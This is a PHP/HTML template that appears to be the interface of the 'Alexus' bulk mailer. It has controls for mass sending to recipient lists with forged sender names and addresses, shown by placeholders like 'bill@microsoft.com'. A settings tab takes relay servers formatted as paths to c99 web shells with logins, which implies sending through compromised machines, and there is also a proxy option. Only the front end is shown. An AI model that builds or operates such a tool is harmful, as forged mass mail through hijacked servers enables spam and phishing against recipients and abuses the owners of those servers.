<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3><?php tr('uploadlist');?></h3>
</div>
<div class="modal-body">
<iframe src="<?php print $_SERVER['PHP_SELF'];?>?upload_form" width="260px" height="80px" frameborder="0"></iframe>
</div>
<div class="modal-footer">
<a href="#" class="btn" data-dismiss="modal"><?php tr('close');?></a>
<a href="#" class="btn btn-primary" onclick="UploadClickHandler(this);return false"><?php tr('upload');?></a>
</div>
</div>
<div class="modal hide fade" id="LoadSaveDialog">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3><?php tr('uploadtemplate');?></h3>
</div>
<div class="modal-body">
<iframe src="<?php print $_SERVER['PHP_SELF'];?>?loadsave" width="260px" height="80px" frameborder="0"></iframe>
</div>
<div class="modal-footer">
<a href="#" class="btn" data-dismiss="modal"><?php tr('close');?></a>
<a href="#" class="btn btn-primary" onclick="UploadClickHandler(this);return false"><?php tr('upload');?></a>
</div>
</div>
<div class="container">
<div class="row">
<div class="span12">
<div class="navbar">
<div class="navbar-inner">
<a class="brand" href="#" id="hello"><?php tr('name');?> <?php echo VERSION;?></a>
<ul class="nav">
<li><a href="#prime" id="prime"><img alt="<?php tr('main',false);?>" src=""></a></li>
<li><a href="#help" id="help"><img alt="<?php tr('help',false);?>" src=""></a></li>
<li><a href="#settings" id="settings"><img alt="<?php tr('settings',false);?>" src=""></a></li>
</ul>
<ul class="nav pull-right">
<li><a href="#" onclick="setLang('ru');return false">
<img alt="русский" src="" />
</a></li>
<li><a href="#" onclick="setLang('en');return false">
<img alt="english" src="" />
</a></li>
</ul>
</div>
</div>
</div>
</div>
<div class="row section-screen" id="help-screen">
<div class="span12">
<div class="well">
<?php tr('helppage',false);?>
</div>
</div>
</div>
<div class="row section-screen" id="preview-screen">
<div class="span12">
<div class="well">
<h3><?php tr('preview');?></h3>
<button class="btn prime-button"><?php tr('backtoeditor',false);?></button>
<iframe src="about:blank" style="width:100%; height:600px;"></iframe>
<button class="btn prime-button"><?php tr('backtoeditor',false);?></button>
</div>
</div>
</div>
<div class="row section-screen" id="settings-screen">
<div class="span12">
<div class="well">
<h2><?php tr('settings');?></h2>
<ul class="nav nav-tabs">
<li class="active"><a href="#home-tab"data-toggle="tab"><?php tr('settings-primary')?></a></li>
<li><a href="#outservers-tab" data-toggle="tab"><?php tr('settings-outservers')?></a></li>
<li><a href="#security-tab" data-toggle="tab"><?php tr('settings-security')?></a></li>
</ul>
<div class="tab-content">
<div class="tab-pane active" id="home-tab">
<?php tr('threadsnum');?><br>
<div class="btn-group">
<input type="button" class="btn" onclick="dThreads();" value="<?php tr('less',false);?>"><button class="btn" id="THREADS">4</button><input type="button" class="btn" onclick="iThreads();" value="<?php tr('more',false);?>">
</div>
<br><br>
<?php tr('timeoutlen');?><br>
<input type="text" class="input-mini" id="TIMEOUT" value="0" style="height:25px; margin-top:10px;"><div id="TIMEOUT_RANGE" min="0" max="3600"></div>
<br><br>
<?php tr('settings-history-length')?> <input type="text" class="input-mini" id="maxDoneSize" value="25" style="height:25px; margin-top:10px;">
</div>
<div class="tab-pane" id="outservers-tab">
<input type="checkbox" id="use_out_servers" style="display:none;">
<button type="button" class="btn btn-danger btn-checkbox" data-toggle="#use_out_servers"><i class="icon-remove"></i></button> <?php tr('useoutservers');?><br><br>
<?php tr('settings-outservers-doc')?>
<br>
<textarea id="out_servers" style="width:100%; height:250px;" placeholder="Пример: http://serv4.ru/sw.php|c99|login:password"></textarea><br>
<?php tr('settings-outservers-check')?>
<br><br>
<div class="progress" id="outprogressbar">
<div class="bar bar-warning" style="width: 0%;"></div>
<div class="barcounter">0/0</div>
</div>
<?php tr('settings-outservers-check-log')?>
<div class="well" id="pingout_log" style="width:860px; height:150px;overflow-y:scroll;"></div>
</div>
<div class="tab-pane" id="security-tab">
<?php
$no_write_perm=false;
clearstatcache();
if(!is_writable(__FILE__)):
$no_write_perm=true;
?>
<div class="alert alert-error">
<?php tr('settings-security-notwritable')?>
</div>
<?php endif;?>
<div class="alert alert-success" style="display:none;" id="passchangesuccess">
<?php tr('settings-security-password-changed')?>
</div>
<div class="alert alert-error" style="display:none;" id="passchangeerror">
<?php tr('settings-security-password-not-changed')?>
</div>
<table border=0>
<tr>
<td><input type="text" id="inputLogin" class="txtinput" placeholder="<?php tr('login',false);?>" <?php if($no_write_perm):?>readonly<?endif;?>></td>
<td><input type="text" id="inputPassword" class="txtinput" placeholder="<?php tr('password',false);?>" <?php if($no_write_perm):?>readonly<?endif;?>></td>
</tr>
<tr>
<td>
<button type="button" class="btn" onclick="ChangePass($('#inputLogin').val(),$('#inputPassword').val())" <?php if($no_write_perm):?>disabled<?endif;?>><?php tr('settings-security-set-password')?></button>
</td><td>
<button type="button" class="btn btn-danger" onclick="ChangePass('','');" <?php if($no_write_perm):?>disabled<?endif;?>><?php tr('settings-security-remove-password')?></button>
</td>
</tr>
</table>
<br><br>
<input type="checkbox" id="use_proxy_server" style="display:none;">
<button type="button" class="btn btn-danger btn-checkbox" data-toggle="#use_proxy_server"><i class="icon-remove"></i></button> <?php tr('settings-security-use-proxy')?><br>
<input type="text" class="txtinput" id="proxy_server_uri" placeholder="http://proxyserver.ru:8080">
</div>
</div>
</div>
</div>
</div>
<div class="row section-screen" id="prime-screen">
<div class="span3">
<div id="console" class="well" style="text-align:center;"><?php tr('status');?></div>
<div id="ext-console" class="well"></div>
</div>
<div class="span9">
<div class="progress" id="progressbar">
<div class="bar bar-warning" style="width: 0%;"></div>
<div class="barcounter">0/0</div>
</div>
<div class="well status">
<b><?php tr('status');?>: <span class="label label-warning"><?php tr('status-idle');?></span></b>
<div class="controls">
<button class="btn" disabled="disabled" id="ResumeSendMail" onclick="ResumeSendMail()"><i class="icon-play"></i> <?php tr('process-resume');?></button> <button class="btn" disabled="disabled" id="PauseSendMail" onclick="PauseSendMail()"><i class="icon-pause"></i> <?php tr('process-pause');?></button> <button class="btn" disabled="disabled" id="StopSendMail" onclick="StopSendMail()"><i class="icon-stop"></i> <?php tr('process-cancel');?></button>
</div>
</div>
<form class="form-horizontal">
<div class="control-group">
<label class="control-label" for="inputEmail"><?php tr('recipient');?> [TO-EMAIL]</label>
<div class="controls">
<textarea name="to" id="to" class="input-xlarge txtinput" placeholder="vasya@yandex.ru"></textarea>
<div class="input-append">
<span class="add-on" onclick="ShowUpload();return false" style="cursor:pointer;"><?php tr('upload');?></span>
</div>
</div>
</div>
<div class="control-group">
<label class="control-label" for="inputEmail"><?php tr('fromname');?> [FROM-NAME]</label>
<div class="controls">
<textarea name="fromname" id="fromname" class="input-xlarge txtinput" placeholder="Bill Gates"></textarea>
</div>
</div>
<div class="control-group">
<label class="control-label" for="inputEmail"><?php tr('frommail');?> [FROM-EMAIL]</label>
<div class="controls">
<textarea name="frommail" id="frommail" class="input-xlarge txtinput" placeholder="bill@microsoft.com"></textarea>
</div>
</div>
<div class="control-group">
<label class="control-label" for="inputEmail"><?php tr('replymail');?> [REPLY-EMAIL]</label>
<div class="controls">
<textarea name="replymail" id="replymail" class="input-xlarge txtinput" placeholder="my@email.com"></textarea>
</div>
</div>
<div class="control-group">
<label class="control-label" for="inputEmail"><?php tr('subject');?> [THEME]</label>
<div class="controls">
<textarea name="tema" id="tema" class="input-xlarge txtinput" placeholder="<?php tr('subject_example',false);?>"></textarea>
</div>
</div>
<div class="control-group">
<label class="control-label" for="inputEmail"><?php tr('addfield');?></label>
<div class="controls">
<div class="input-prepend">
<span class="add-on">[ADD0]</span>
</div>
<input type="text" name="additional" id="additional0" class="input-xlarge txtinput additional" placeholder="<?php tr('addfield2',false);?>"></textarea>
<div class="input-append">
<span class="add-on"><span class="addfield" onclick="AddField(this)">+</span></span>
</div>
</div>
</div>
<div class="control-group">
<label class="control-label" for="inputEmail"><?php tr('mailtype');?> (
<a href="#" rel="tooltip" data-title="<?php tr('plaintext',false);?>">text</a>,
<a href="#" rel="tooltip" data-title="<?php tr('withformating',false);?>">html</a>,
<a href="#" rel="tooltip" data-title="<?php tr('htmle',false);?>">html(e)</a>)
</label>
<div class="controls">
<select name="type" id="type">
<option value="html">html</option>
<option value="htmle">html(e)</option>
<option value="text">text</option>
</select>
</div>
</div>
<div class="btn-group" id="textcontrols">
<button id="makebold" onclick="MakeBold();return false" class="btn">B</button>
<button id="makeitalic" onclick="MakeItalic();return false" class="btn">I</button>
<button id="makeunderline" onclick="MakeUnderline();return false" class="btn">U</button>
<button id="makereverse" onclick="MakeReverse();return false" class="btn">esreveR</button>
</div>
<textarea name="text" id="text" style="width:100%;height:200px;"></textarea>
<button class="btn" onclick="showUniversalUpload();return false"><i class="icon-plus"></i> <?php tr('attachfile');?></button>
<span id="attachedFiles" class="pull-right"></span>
</form>
<div class="pull-left">
<button class="btn btn-large" onclick="SaveData()"><?php tr('save');?></a>
<button class="btn btn-large" onclick="TogleLoadSave()"><?php tr('load');?></a>
</div>
<div class="pull-right">
<button class="btn btn-large btn-primary" onclick="Send()"><?php tr('send');?></a>
<button class="btn btn-large" onclick="Preview()"><?php tr('preview');?></a>
</div>
</div>
</div>
<div class="row">
<div class="span12">
<div class="well" style="text-align:center;">
© <a href="http://mailer.a-l-e-x-u-s.ru/" target="_blank">Alexus</a> <?php echo date("Y");?>
</div>
</di>
</div>
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.0/js/bootstrap.min.js"></script>
</body>
</html>